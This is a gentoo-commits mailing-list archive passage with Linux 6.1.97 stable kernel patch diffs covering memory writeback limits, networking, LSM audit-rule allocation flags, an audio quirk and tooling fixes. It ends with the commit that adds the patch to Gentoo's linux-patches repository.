++	if (thresh > UINT_MAX)
++		thresh = UINT_MAX;
++	/* This makes sure bg_thresh is within 32-bits as well */
++	if (bg_thresh >= thresh)
++		bg_thresh = thresh / 2;
+ 	dtc->thresh = thresh;
+ 	dtc->bg_thresh = bg_thresh;
+ 
+@@ -470,7 +477,11 @@ static unsigned long node_dirty_limit(struct pglist_data *pgdat)
+ 	if (rt_task(tsk))
+ 		dirty += dirty / 4;
+ 
+-	return dirty;
++	/*
++	 * Dirty throttling logic assumes the limits in page units fit into
++	 * 32-bits. This gives 16TB dirty limits max which is hopefully enough.
++	 */
++	return min_t(unsigned long, dirty, UINT_MAX);
+ }
+ 
+ /**
+@@ -507,10 +518,17 @@ static int dirty_background_bytes_handler(struct ctl_table *table, int write,
+ 		void *buffer, size_t *lenp, loff_t *ppos)
+ {
+ 	int ret;
++	unsigned long old_bytes = dirty_background_bytes;
+ 
+ 	ret = proc_doulongvec_minmax(table, write, buffer, lenp, ppos);
+-	if (ret == 0 && write)
++	if (ret == 0 && write) {
++		if (DIV_ROUND_UP(dirty_background_bytes, PAGE_SIZE) >
++								UINT_MAX) {
++			dirty_background_bytes = old_bytes;
++			return -ERANGE;
++		}
+ 		dirty_background_ratio = 0;
++	}
+ 	return ret;
+ }
+ 
+@@ -536,6 +554,10 @@ static int dirty_bytes_handler(struct ctl_table *table, int write,
+ 
+ 	ret = proc_doulongvec_minmax(table, write, buffer, lenp, ppos);
+ 	if (ret == 0 && write && vm_dirty_bytes != old_bytes) {
++		if (DIV_ROUND_UP(vm_dirty_bytes, PAGE_SIZE) > UINT_MAX) {
++			vm_dirty_bytes = old_bytes;
++			return -ERANGE;
++		}
+ 		writeback_set_ratelimit();
+ 		vm_dirty_ratio = 0;
+ 	}
+@@ -1526,7 +1548,7 @@ static inline void wb_dirty_limits(struct dirty_throttle_control *dtc)
+ 	 */
+ 	dtc->wb_thresh = __wb_calc_thresh(dtc);
+ 	dtc->wb_bg_thresh = dtc->thresh ?
+-		div64_u64(dtc->wb_thresh * dtc->bg_thresh, dtc->thresh) : 0;
++		div_u64((u64)dtc->wb_thresh * dtc->bg_thresh, dtc->thresh) : 0;
+ 
+ 	/*
+ 	 * In order to avoid the stacked BDI deadlock we need
+diff --git a/net/core/datagram.c b/net/core/datagram.c
+index 8dabb9a74cb17..cdd65ca3124a4 100644
+--- a/net/core/datagram.c
++++ b/net/core/datagram.c
+@@ -434,15 +434,22 @@ static int __skb_datagram_iter(const struct sk_buff *skb, int offset,
+ 
+ 		end = start + skb_frag_size(frag);
+ 		if ((copy = end - offset) > 0) {
+-			struct page *page = skb_frag_page(frag);
+-			u8 *vaddr = kmap(page);
++			u32 p_off, p_len, copied;
++			struct page *p;
++			u8 *vaddr;
+ 
+ 			if (copy > len)
+ 				copy = len;
+-			n = INDIRECT_CALL_1(cb, simple_copy_to_iter,
+-					vaddr + skb_frag_off(frag) + offset - start,
+-					copy, data, to);
+-			kunmap(page);
++
++			skb_frag_foreach_page(frag,
++					      skb_frag_off(frag) + offset - start,
++					      copy, p, p_off, p_len, copied) {
++				vaddr = kmap_local_page(p);
++				n = INDIRECT_CALL_1(cb, simple_copy_to_iter,
++					vaddr + p_off, p_len, data, to);
++				kunmap_local(vaddr);
++			}
++
+ 			offset += n;
+ 			if (n != copy)
+ 				goto short_copy;
+diff --git a/net/ipv4/inet_diag.c b/net/ipv4/inet_diag.c
+index 8f690a6e61baa..e4e1999d93f50 100644
+--- a/net/ipv4/inet_diag.c
++++ b/net/ipv4/inet_diag.c
+@@ -1281,6 +1281,7 @@ static int inet_diag_dump_compat(struct sk_buff *skb,
+ 	req.sdiag_family = AF_UNSPEC; /* compatibility */
+ 	req.sdiag_protocol = inet_diag_type2proto(cb->nlh->nlmsg_type);
+ 	req.idiag_ext = rc->idiag_ext;
++	req.pad = 0;
+ 	req.idiag_states = rc->idiag_states;
+ 	req.id = rc->id;
+ 
+@@ -1296,6 +1297,7 @@ static int inet_diag_get_exact_compat(struct sk_buff *in_skb,
+ 	req.sdiag_family = rc->idiag_family;
+ 	req.sdiag_protocol = inet_diag_type2proto(nlh->nlmsg_type);
+ 	req.idiag_ext = rc->idiag_ext;
++	req.pad = 0;
+ 	req.idiag_states = rc->idiag_states;
+ 	req.id = rc->id;
+ 
+diff --git a/net/ipv4/tcp_input.c b/net/ipv4/tcp_input.c
+index 2146299016eda..317cb90d77102 100644
+--- a/net/ipv4/tcp_input.c
++++ b/net/ipv4/tcp_input.c
+@@ -3041,7 +3041,7 @@ static void tcp_fastretrans_alert(struct sock *sk, const u32 prior_snd_una,
+ 			return;
+ 
+ 		if (tcp_try_undo_dsack(sk))
+-			tcp_try_keep_open(sk);
++			tcp_try_to_open(sk, flag);
+ 
+ 		tcp_identify_packet_loss(sk, ack_flag);
+ 		if (icsk->icsk_ca_state != TCP_CA_Recovery) {
+diff --git a/net/ipv4/tcp_metrics.c b/net/ipv4/tcp_metrics.c
+index a7364ff8b558d..a4e03a7a2c030 100644
+--- a/net/ipv4/tcp_metrics.c
++++ b/net/ipv4/tcp_metrics.c
+@@ -619,6 +619,7 @@ static const struct nla_policy tcp_metrics_nl_policy[TCP_METRICS_ATTR_MAX + 1] =
+ 	[TCP_METRICS_ATTR_ADDR_IPV4]	= { .type = NLA_U32, },
+ 	[TCP_METRICS_ATTR_ADDR_IPV6]	= { .type = NLA_BINARY,
+ 					    .len = sizeof(struct in6_addr), },
++	[TCP_METRICS_ATTR_SADDR_IPV4]	= { .type = NLA_U32, },
+ 	/* Following attributes are not received for GET/DEL,
+ 	 * we keep them for reference
+ 	 */
+diff --git a/net/mac802154/main.c b/net/mac802154/main.c
+index bd7bdb1219dd8..356e86c3c9b15 100644
+--- a/net/mac802154/main.c
++++ b/net/mac802154/main.c
+@@ -152,8 +152,10 @@ void ieee802154_configure_durations(struct wpan_phy *phy)
+ 	}
+ 
+ 	phy->symbol_duration = duration;
+-	phy->lifs_period = (IEEE802154_LIFS_PERIOD * phy->symbol_duration) / NSEC_PER_SEC;
+-	phy->sifs_period = (IEEE802154_SIFS_PERIOD * phy->symbol_duration) / NSEC_PER_SEC;
++	phy->lifs_period =
++		(IEEE802154_LIFS_PERIOD * phy->symbol_duration) / NSEC_PER_USEC;
++	phy->sifs_period =
++		(IEEE802154_SIFS_PERIOD * phy->symbol_duration) / NSEC_PER_USEC;
+ }
+ EXPORT_SYMBOL(ieee802154_configure_durations);
+ 
+@@ -175,10 +177,10 @@ static void ieee802154_setup_wpan_phy_pib(struct wpan_phy *wpan_phy)
+ 	 * Should be done when all drivers sets this value.
+ 	 */
+ 
+-	wpan_phy->lifs_period =
+-		(IEEE802154_LIFS_PERIOD * wpan_phy->symbol_duration) / 1000;
+-	wpan_phy->sifs_period =
+-		(IEEE802154_SIFS_PERIOD * wpan_phy->symbol_duration) / 1000;
++	wpan_phy->lifs_period =	(IEEE802154_LIFS_PERIOD *
++				 wpan_phy->symbol_duration) / NSEC_PER_USEC;
++	wpan_phy->sifs_period =	(IEEE802154_SIFS_PERIOD *
++				 wpan_phy->symbol_duration) / NSEC_PER_USEC;
+ }
+ 
+ int ieee802154_register_hw(struct ieee802154_hw *hw)
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index 97ea72d31bd35..d18b698139caf 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -10858,8 +10858,7 @@ static int nft_rcv_nl_event(struct notifier_block *this, unsigned long event,
+ 
+ 	gc_seq = nft_gc_seq_begin(nft_net);
+ 
+-	if (!list_empty(&nf_tables_destroy_list))
+-		nf_tables_trans_destroy_flush_work();
++	nf_tables_trans_destroy_flush_work();
+ again:
+ 	list_for_each_entry(table, &nft_net->tables, list) {
+ 		if (nft_table_has_owner(table) &&
+diff --git a/net/sctp/socket.c b/net/sctp/socket.c
+index 237a6b04adf6f..9689d2f2d91f9 100644
+--- a/net/sctp/socket.c
++++ b/net/sctp/socket.c
+@@ -7116,6 +7116,7 @@ static int sctp_getsockopt_assoc_ids(struct sock *sk, int len,
+ 	struct sctp_sock *sp = sctp_sk(sk);
+ 	struct sctp_association *asoc;
+ 	struct sctp_assoc_ids *ids;
++	size_t ids_size;
+ 	u32 num = 0;
+ 
+ 	if (sctp_style(sk, TCP))
+@@ -7128,11 +7129,11 @@ static int sctp_getsockopt_assoc_ids(struct sock *sk, int len,
+ 		num++;
+ 	}
+ 
+-	if (len < sizeof(struct sctp_assoc_ids) + sizeof(sctp_assoc_t) * num)
++	ids_size = struct_size(ids, gaids_assoc_id, num);
++	if (len < ids_size)
+ 		return -EINVAL;
+ 
+-	len = sizeof(struct sctp_assoc_ids) + sizeof(sctp_assoc_t) * num;
+-
++	len = ids_size;
+ 	ids = kmalloc(len, GFP_USER | __GFP_NOWARN);
+ 	if (unlikely(!ids))
+ 		return -ENOMEM;
+diff --git a/scripts/link-vmlinux.sh b/scripts/link-vmlinux.sh
+index 458b2948b580d..019560548ac98 100755
+--- a/scripts/link-vmlinux.sh
++++ b/scripts/link-vmlinux.sh
+@@ -182,7 +182,7 @@ kallsyms_step()
+ 	mksysmap ${kallsyms_vmlinux} ${kallsyms_vmlinux}.syms
+ 	kallsyms ${kallsyms_vmlinux}.syms ${kallsyms_S}
+ 
+-	info AS ${kallsyms_S}
++	info AS ${kallsymso}
+ 	${CC} ${NOSTDINC_FLAGS} ${LINUXINCLUDE} ${KBUILD_CPPFLAGS} \
+ 	      ${KBUILD_AFLAGS} ${KBUILD_AFLAGS_KERNEL} \
+ 	      -c -o ${kallsymso} ${kallsyms_S}
+diff --git a/security/apparmor/audit.c b/security/apparmor/audit.c
+index 704b0c895605a..963df28584eed 100644
+--- a/security/apparmor/audit.c
++++ b/security/apparmor/audit.c
+@@ -173,7 +173,7 @@ void aa_audit_rule_free(void *vrule)
+ 	}
+ }
+ 
+-int aa_audit_rule_init(u32 field, u32 op, char *rulestr, void **vrule)
++int aa_audit_rule_init(u32 field, u32 op, char *rulestr, void **vrule, gfp_t gfp)
+ {
+ 	struct aa_audit_rule *rule;
+ 
+@@ -186,14 +186,14 @@ int aa_audit_rule_init(u32 field, u32 op, char *rulestr, void **vrule)
+ 		return -EINVAL;
+ 	}
+ 
+-	rule = kzalloc(sizeof(struct aa_audit_rule), GFP_KERNEL);
++	rule = kzalloc(sizeof(struct aa_audit_rule), gfp);
+ 
+ 	if (!rule)
+ 		return -ENOMEM;
+ 
+ 	/* Currently rules are treated as coming from the root ns */
+ 	rule->label = aa_label_parse(&root_ns->unconfined->label, rulestr,
+-				     GFP_KERNEL, true, false);
++				     gfp, true, false);
+ 	if (IS_ERR(rule->label)) {
+ 		int err = PTR_ERR(rule->label);
+ 		aa_audit_rule_free(rule);
+diff --git a/security/apparmor/include/audit.h b/security/apparmor/include/audit.h
+index 18519a4eb67e3..f325f1bef8d6d 100644
+--- a/security/apparmor/include/audit.h
++++ b/security/apparmor/include/audit.h
+@@ -186,7 +186,7 @@ static inline int complain_error(int error)
+ }
+ 
+ void aa_audit_rule_free(void *vrule);
+-int aa_audit_rule_init(u32 field, u32 op, char *rulestr, void **vrule);
++int aa_audit_rule_init(u32 field, u32 op, char *rulestr, void **vrule, gfp_t gfp);
+ int aa_audit_rule_known(struct audit_krule *rule);
+ int aa_audit_rule_match(u32 sid, u32 field, u32 op, void *vrule);
+ 
+diff --git a/security/integrity/ima/ima.h b/security/integrity/ima/ima.h
+index be965a8715e4e..c80bc15b4486e 100644
+--- a/security/integrity/ima/ima.h
++++ b/security/integrity/ima/ima.h
+@@ -428,7 +428,7 @@ static inline void ima_free_modsig(struct modsig *modsig)
+ #else
+ 
+ static inline int ima_filter_rule_init(u32 field, u32 op, char *rulestr,
+-				       void **lsmrule)
++				       void **lsmrule, gfp_t gfp)
+ {
+ 	return -EINVAL;
+ }
+diff --git a/security/integrity/ima/ima_policy.c b/security/integrity/ima/ima_policy.c
+index bdc40535ff489..1f930711db769 100644
+--- a/security/integrity/ima/ima_policy.c
++++ b/security/integrity/ima/ima_policy.c
+@@ -377,7 +377,8 @@ static void ima_free_rule(struct ima_rule_entry *entry)
+ 	kfree(entry);
+ }
+ 
+-static struct ima_rule_entry *ima_lsm_copy_rule(struct ima_rule_entry *entry)
++static struct ima_rule_entry *ima_lsm_copy_rule(struct ima_rule_entry *entry,
++						gfp_t gfp)
+ {
+ 	struct ima_rule_entry *nentry;
+ 	int i;
+@@ -386,7 +387,7 @@ static struct ima_rule_entry *ima_lsm_copy_rule(struct ima_rule_entry *entry)
+ 	 * Immutable elements are copied over as pointers and data; only
+ 	 * lsm rules can change
+ 	 */
+-	nentry = kmemdup(entry, sizeof(*nentry), GFP_KERNEL);
++	nentry = kmemdup(entry, sizeof(*nentry), gfp);
+ 	if (!nentry)
+ 		return NULL;
+ 
+@@ -401,7 +402,8 @@ static struct ima_rule_entry *ima_lsm_copy_rule(struct ima_rule_entry *entry)
+ 
+ 		ima_filter_rule_init(nentry->lsm[i].type, Audit_equal,
+ 				     nentry->lsm[i].args_p,
+-				     &nentry->lsm[i].rule);
++				     &nentry->lsm[i].rule,
++				     gfp);
+ 		if (!nentry->lsm[i].rule)
+ 			pr_warn("rule for LSM \'%s\' is undefined\n",
+ 				nentry->lsm[i].args_p);
+@@ -414,7 +416,7 @@ static int ima_lsm_update_rule(struct ima_rule_entry *entry)
+ 	int i;
+ 	struct ima_rule_entry *nentry;
+ 
+-	nentry = ima_lsm_copy_rule(entry);
++	nentry = ima_lsm_copy_rule(entry, GFP_KERNEL);
+ 	if (!nentry)
+ 		return -ENOMEM;
+ 
+@@ -638,7 +640,7 @@ static bool ima_match_rules(struct ima_rule_entry *rule,
+ 		}
+ 
+ 		if (rc == -ESTALE && !rule_reinitialized) {
+-			lsm_rule = ima_lsm_copy_rule(rule);
++			lsm_rule = ima_lsm_copy_rule(rule, GFP_ATOMIC);
+ 			if (lsm_rule) {
+ 				rule_reinitialized = true;
+ 				goto retry;
+@@ -1113,7 +1115,8 @@ static int ima_lsm_rule_init(struct ima_rule_entry *entry,
+ 	entry->lsm[lsm_rule].type = audit_type;
+ 	result = ima_filter_rule_init(entry->lsm[lsm_rule].type, Audit_equal,
+ 				      entry->lsm[lsm_rule].args_p,
+-				      &entry->lsm[lsm_rule].rule);
++				      &entry->lsm[lsm_rule].rule,
++				      GFP_KERNEL);
+ 	if (!entry->lsm[lsm_rule].rule) {
+ 		pr_warn("rule for LSM \'%s\' is undefined\n",
+ 			entry->lsm[lsm_rule].args_p);
+diff --git a/security/security.c b/security/security.c
+index 1b504c296551c..fb1692254851b 100644
+--- a/security/security.c
++++ b/security/security.c
+@@ -2617,9 +2617,11 @@ int security_key_getsecurity(struct key *key, char **_buffer)
+ 
+ #ifdef CONFIG_AUDIT
+ 
+-int security_audit_rule_init(u32 field, u32 op, char *rulestr, void **lsmrule)
++int security_audit_rule_init(u32 field, u32 op, char *rulestr, void **lsmrule,
++			     gfp_t gfp)
+ {
+-	return call_int_hook(audit_rule_init, 0, field, op, rulestr, lsmrule);
++	return call_int_hook(audit_rule_init, 0, field, op, rulestr, lsmrule,
++			     gfp);
+ }
+ 
+ int security_audit_rule_known(struct audit_krule *krule)
+diff --git a/security/selinux/include/audit.h b/security/selinux/include/audit.h
+index 406bceb90c6cd..ef54f61a30669 100644
+--- a/security/selinux/include/audit.h
++++ b/security/selinux/include/audit.h
+@@ -21,12 +21,14 @@
+  *	@op: the operator the rule uses
+  *	@rulestr: the text "target" of the rule
+  *	@rule: pointer to the new rule structure returned via this
++ *	@gfp: GFP flag used for kmalloc
+  *
+  *	Returns 0 if successful, -errno if not.  On success, the rule structure
+  *	will be allocated internally.  The caller must free this structure with
+  *	selinux_audit_rule_free() after use.
+  */
+-int selinux_audit_rule_init(u32 field, u32 op, char *rulestr, void **rule);
++int selinux_audit_rule_init(u32 field, u32 op, char *rulestr, void **rule,
++			    gfp_t gfp);
+ 
+ /**
+  *	selinux_audit_rule_free - free an selinux audit rule structure.
+diff --git a/security/selinux/ss/services.c b/security/selinux/ss/services.c
+index 64a6a37dc36d9..2b8ebd390e375 100644
+--- a/security/selinux/ss/services.c
++++ b/security/selinux/ss/services.c
+@@ -3563,7 +3563,8 @@ void selinux_audit_rule_free(void *vrule)
+ 	}
+ }
+ 
+-int selinux_audit_rule_init(u32 field, u32 op, char *rulestr, void **vrule)
++int selinux_audit_rule_init(u32 field, u32 op, char *rulestr, void **vrule,
++			    gfp_t gfp)
+ {
+ 	struct selinux_state *state = &selinux_state;
+ 	struct selinux_policy *policy;
+@@ -3604,7 +3605,7 @@ int selinux_audit_rule_init(u32 field, u32 op, char *rulestr, void **vrule)
+ 		return -EINVAL;
+ 	}
+ 
+-	tmprule = kzalloc(sizeof(struct selinux_audit_rule), GFP_KERNEL);
++	tmprule = kzalloc(sizeof(struct selinux_audit_rule), gfp);
+ 	if (!tmprule)
+ 		return -ENOMEM;
+ 
+diff --git a/security/smack/smack_lsm.c b/security/smack/smack_lsm.c
+index feba69549d086..b0a483e40c827 100644
+--- a/security/smack/smack_lsm.c
++++ b/security/smack/smack_lsm.c
+@@ -4552,11 +4552,13 @@ static int smack_post_notification(const struct cred *w_cred,
+  * @op: required testing operator (=, !=, >, <, ...)
+  * @rulestr: smack label to be audited
+  * @vrule: pointer to save our own audit rule representation
++ * @gfp: type of the memory for the allocation
+  *
+  * Prepare to audit cases where (@field @op @rulestr) is true.
+  * The label to be audited is created if necessay.
+  */
+-static int smack_audit_rule_init(u32 field, u32 op, char *rulestr, void **vrule)
++static int smack_audit_rule_init(u32 field, u32 op, char *rulestr, void **vrule,
++				 gfp_t gfp)
+ {
+ 	struct smack_known *skp;
+ 	char **rule = (char **)vrule;
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index 11ec5783a2f17..4635dc70a8404 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -11584,6 +11584,7 @@ enum {
+ 	ALC897_FIXUP_LENOVO_HEADSET_MODE,
+ 	ALC897_FIXUP_HEADSET_MIC_PIN2,
+ 	ALC897_FIXUP_UNIS_H3C_X500S,
++	ALC897_FIXUP_HEADSET_MIC_PIN3,
+ };
+ 
+ static const struct hda_fixup alc662_fixups[] = {
+@@ -12030,10 +12031,18 @@ static const struct hda_fixup alc662_fixups[] = {
+ 			{}
+ 		},
+ 	},
++	[ALC897_FIXUP_HEADSET_MIC_PIN3] = {
++		.type = HDA_FIXUP_PINS,
++		.v.pins = (const struct hda_pintbl[]) {
++			{ 0x19, 0x03a11050 }, /* use as headset mic */
++			{ }
++		},
++	},
+ };
+ 
+ static const struct snd_pci_quirk alc662_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1019, 0x9087, "ECS", ALC662_FIXUP_ASUS_MODE2),
++	SND_PCI_QUIRK(0x1019, 0x9859, "JP-IK LEAP W502", ALC897_FIXUP_HEADSET_MIC_PIN3),
+ 	SND_PCI_QUIRK(0x1025, 0x022f, "Acer Aspire One", ALC662_FIXUP_INV_DMIC),
+ 	SND_PCI_QUIRK(0x1025, 0x0241, "Packard Bell DOTS", ALC662_FIXUP_INV_DMIC),
+ 	SND_PCI_QUIRK(0x1025, 0x0308, "Acer Aspire 8942G", ALC662_FIXUP_ASPIRE),
+diff --git a/tools/lib/bpf/bpf_core_read.h b/tools/lib/bpf/bpf_core_read.h
+index 496e6a8ee0dc9..41740ae8aad73 100644
+--- a/tools/lib/bpf/bpf_core_read.h
++++ b/tools/lib/bpf/bpf_core_read.h
+@@ -102,6 +102,7 @@ enum bpf_enum_value_kind {
+ 	case 2: val = *(const unsigned short *)p; break;		      \
+ 	case 4: val = *(const unsigned int *)p; break;			      \
+ 	case 8: val = *(const unsigned long long *)p; break;		      \
++	default: val = 0; break;					      \
+ 	}								      \
+ 	val <<= __CORE_RELO(s, field, LSHIFT_U64);			      \
+ 	if (__CORE_RELO(s, field, SIGNED))				      \
+diff --git a/tools/power/x86/turbostat/turbostat.c b/tools/power/x86/turbostat/turbostat.c
+index a41bad8e653bb..66e31da942588 100644
+--- a/tools/power/x86/turbostat/turbostat.c
++++ b/tools/power/x86/turbostat/turbostat.c
+@@ -566,6 +566,7 @@ struct topo_params {
+ 	int num_cpus;
+ 	int num_cores;
+ 	int max_cpu_num;
++	int max_die_id;
+ 	int max_node_num;
+ 	int nodes_per_pkg;
+ 	int cores_per_node;
+@@ -5864,7 +5865,6 @@ void topology_probe()
+ 	int i;
+ 	int max_core_id = 0;
+ 	int max_package_id = 0;
+-	int max_die_id = 0;
+ 	int max_siblings = 0;
+ 
+ 	/* Initialize num_cpus, max_cpu_num */
+@@ -5933,8 +5933,8 @@ void topology_probe()
+ 
+ 		/* get die information */
+ 		cpus[i].die_id = get_die_id(i);
+-		if (cpus[i].die_id > max_die_id)
+-			max_die_id = cpus[i].die_id;
++		if (cpus[i].die_id > topo.max_die_id)
++			topo.max_die_id = cpus[i].die_id;
+ 
+ 		/* get numa node information */
+ 		cpus[i].physical_node_id = get_physical_node_id(&cpus[i]);
+@@ -5960,9 +5960,9 @@ void topology_probe()
+ 	if (!summary_only && topo.cores_per_node > 1)
+ 		BIC_PRESENT(BIC_Core);
+ 
+-	topo.num_die = max_die_id + 1;
++	topo.num_die = topo.max_die_id + 1;
+ 	if (debug > 1)
+-		fprintf(outf, "max_die_id %d, sizing for %d die\n", max_die_id, topo.num_die);
++		fprintf(outf, "max_die_id %d, sizing for %d die\n", topo.max_die_id, topo.num_die);
+ 	if (!summary_only && topo.num_die > 1)
+ 		BIC_PRESENT(BIC_Die);
+ 
+diff --git a/tools/testing/selftests/net/msg_zerocopy.c b/tools/testing/selftests/net/msg_zerocopy.c
+index bdc03a2097e85..7ea5fb28c93db 100644
+--- a/tools/testing/selftests/net/msg_zerocopy.c
++++ b/tools/testing/selftests/net/msg_zerocopy.c
+@@ -85,6 +85,7 @@ static bool cfg_rx;
+ static int  cfg_runtime_ms	= 4200;
+ static int  cfg_verbose;
+ static int  cfg_waittime_ms	= 500;
++static int  cfg_notification_limit = 32;
+ static bool cfg_zerocopy;
+ 
+ static socklen_t cfg_alen;
+@@ -95,6 +96,7 @@ static char payload[IP_MAXPACKET];
+ static long packets, bytes, completions, expected_completions;
+ static int  zerocopied = -1;
+ static uint32_t next_completion;
++static uint32_t sends_since_notify;
+ 
+ static unsigned long gettimeofday_ms(void)
+ {
+@@ -208,6 +210,7 @@ static bool do_sendmsg(int fd, struct msghdr *msg, bool do_zerocopy, int domain)
+ 		error(1, errno, "send");
+ 	if (cfg_verbose && ret != len)
+ 		fprintf(stderr, "send: ret=%u != %u\n", ret, len);
++	sends_since_notify++;
+ 
+ 	if (len) {
+ 		packets++;
+@@ -435,7 +438,7 @@ static bool do_recv_completion(int fd, int domain)
+ 	/* Detect notification gaps. These should not happen often, if at all.
+ 	 * Gaps can occur due to drops, reordering and retransmissions.
+ 	 */
+-	if (lo != next_completion)
++	if (cfg_verbose && lo != next_completion)
+ 		fprintf(stderr, "gap: %u..%u does not append to %u\n",
+ 			lo, hi, next_completion);
+ 	next_completion = hi + 1;
+@@ -460,6 +463,7 @@ static bool do_recv_completion(int fd, int domain)
+ static void do_recv_completions(int fd, int domain)
+ {
+ 	while (do_recv_completion(fd, domain)) {}
++	sends_since_notify = 0;
+ }
+ 
+ /* Wait for all remaining completions on the errqueue */
+@@ -549,6 +553,9 @@ static void do_tx(int domain, int type, int protocol)
+ 		else
+ 			do_sendmsg(fd, &msg, cfg_zerocopy, domain);
+ 
++		if (cfg_zerocopy && sends_since_notify >= cfg_notification_limit)
++			do_recv_completions(fd, domain);
++
+ 		while (!do_poll(fd, POLLOUT)) {
+ 			if (cfg_zerocopy)
+ 				do_recv_completions(fd, domain);
+@@ -708,7 +715,7 @@ static void parse_opts(int argc, char **argv)
+ 
+ 	cfg_payload_len = max_payload_len;
+ 
+-	while ((c = getopt(argc, argv, "46c:C:D:i:mp:rs:S:t:vz")) != -1) {
++	while ((c = getopt(argc, argv, "46c:C:D:i:l:mp:rs:S:t:vz")) != -1) {
+ 		switch (c) {
+ 		case '4':
+ 			if (cfg_family != PF_UNSPEC)
+@@ -736,6 +743,9 @@ static void parse_opts(int argc, char **argv)
+ 			if (cfg_ifindex == 0)
+ 				error(1, errno, "invalid iface: %s", optarg);
+ 			break;
++		case 'l':
++			cfg_notification_limit = strtoul(optarg, NULL, 0);
++			break;
+ 		case 'm':
+ 			cfg_cork_mixed = true;
+ 			break;


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-07-05 11:07 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-07-05 11:07 UTC (permalink / raw
  To: gentoo-commits

commit:     26b4a045b52fba61fefc67ae515a415b96750940
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Fri Jul  5 11:07:06 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Fri Jul  5 11:07:06 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=26b4a045

Linux patch 6.1.97

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1096_linux-6.1.97.patch | 5214 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 5218 insertions(+)

diff --git a/0000_README b/0000_README
index 465332b9..13913ad0 100644
--- a/0000_README
+++ b/0000_README
@@ -427,6 +427,10 @@ Patch:  1095_linux-6.1.96.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.96
 
+Patch:  1096_linux-6.1.97.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.97
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1096_linux-6.1.97.patch b/1096_linux-6.1.97.patch
new file mode 100644
index 00000000..e0146731
--- /dev/null
+++ b/1096_linux-6.1.97.patch
@@ -0,0 +1,5214 @@
+diff --git a/Documentation/devicetree/bindings/i2c/amlogic,meson6-i2c.yaml b/Documentation/devicetree/bindings/i2c/amlogic,meson6-i2c.yaml
+index 199a354ccb970..26bed558c6b87 100644
+--- a/Documentation/devicetree/bindings/i2c/amlogic,meson6-i2c.yaml
++++ b/Documentation/devicetree/bindings/i2c/amlogic,meson6-i2c.yaml
+@@ -2,8 +2,8 @@
+ # Copyright 2019 BayLibre, SAS
+ %YAML 1.2
+ ---
+-$id: "http://devicetree.org/schemas/i2c/amlogic,meson6-i2c.yaml#"
+-$schema: "http://devicetree.org/meta-schemas/core.yaml#"
++$id: http://devicetree.org/schemas/i2c/amlogic,meson6-i2c.yaml#
++$schema: http://devicetree.org/meta-schemas/core.yaml#
+ 
+ title: Amlogic Meson I2C Controller
+ 
+diff --git a/Documentation/devicetree/bindings/i2c/apple,i2c.yaml b/Documentation/devicetree/bindings/i2c/apple,i2c.yaml
+index 4ac61fec90e26..243da7003cec5 100644
+--- a/Documentation/devicetree/bindings/i2c/apple,i2c.yaml
++++ b/Documentation/devicetree/bindings/i2c/apple,i2c.yaml
+@@ -1,8 +1,8 @@
+ # SPDX-License-Identifier: (GPL-2.0 OR BSD-2-Clause)
+ %YAML 1.2
+ ---
+-$id: "http://devicetree.org/schemas/i2c/apple,i2c.yaml#"
+-$schema: "http://devicetree.org/meta-schemas/core.yaml#"
++$id: http://devicetree.org/schemas/i2c/apple,i2c.yaml#
++$schema: http://devicetree.org/meta-schemas/core.yaml#
+ 
+ title: Apple/PASemi I2C controller
+ 
+diff --git a/Documentation/devicetree/bindings/i2c/atmel,at91sam-i2c.yaml b/Documentation/devicetree/bindings/i2c/atmel,at91sam-i2c.yaml
+index ea2303c0e1431..c22e459c175ab 100644
+--- a/Documentation/devicetree/bindings/i2c/atmel,at91sam-i2c.yaml
++++ b/Documentation/devicetree/bindings/i2c/atmel,at91sam-i2c.yaml
+@@ -75,7 +75,7 @@ required:
+   - clocks
+ 
+ allOf:
+-  - $ref: "i2c-controller.yaml"
++  - $ref: /schemas/i2c/i2c-controller.yaml#
+   - if:
+       properties:
+         compatible:
+diff --git a/Documentation/devicetree/bindings/i2c/cdns,i2c-r1p10.yaml b/Documentation/devicetree/bindings/i2c/cdns,i2c-r1p10.yaml
+index 2e95cda7262ad..7a675aa08c442 100644
+--- a/Documentation/devicetree/bindings/i2c/cdns,i2c-r1p10.yaml
++++ b/Documentation/devicetree/bindings/i2c/cdns,i2c-r1p10.yaml
+@@ -1,8 +1,8 @@
+ # SPDX-License-Identifier: (GPL-2.0 OR BSD-2-Clause)
+ %YAML 1.2
+ ---
+-$id: "http://devicetree.org/schemas/i2c/cdns,i2c-r1p10.yaml#"
+-$schema: "http://devicetree.org/meta-schemas/core.yaml#"
++$id: http://devicetree.org/schemas/i2c/cdns,i2c-r1p10.yaml#
++$schema: http://devicetree.org/meta-schemas/core.yaml#
+ 
+ title: Cadence I2C controller
+ 
+diff --git a/Documentation/devicetree/bindings/i2c/i2c-mux-gpio.yaml b/Documentation/devicetree/bindings/i2c/i2c-mux-gpio.yaml
+index 6e0a5686af048..f34cc7ad5a00e 100644
+--- a/Documentation/devicetree/bindings/i2c/i2c-mux-gpio.yaml
++++ b/Documentation/devicetree/bindings/i2c/i2c-mux-gpio.yaml
+@@ -45,7 +45,7 @@ properties:
+ 
+   i2c-parent:
+     description: phandle of the I2C bus that this multiplexer's master-side port is connected to
+-    $ref: "/schemas/types.yaml#/definitions/phandle"
++    $ref: /schemas/types.yaml#/definitions/phandle
+ 
+   mux-gpios:
+     description: list of GPIOs used to control the muxer
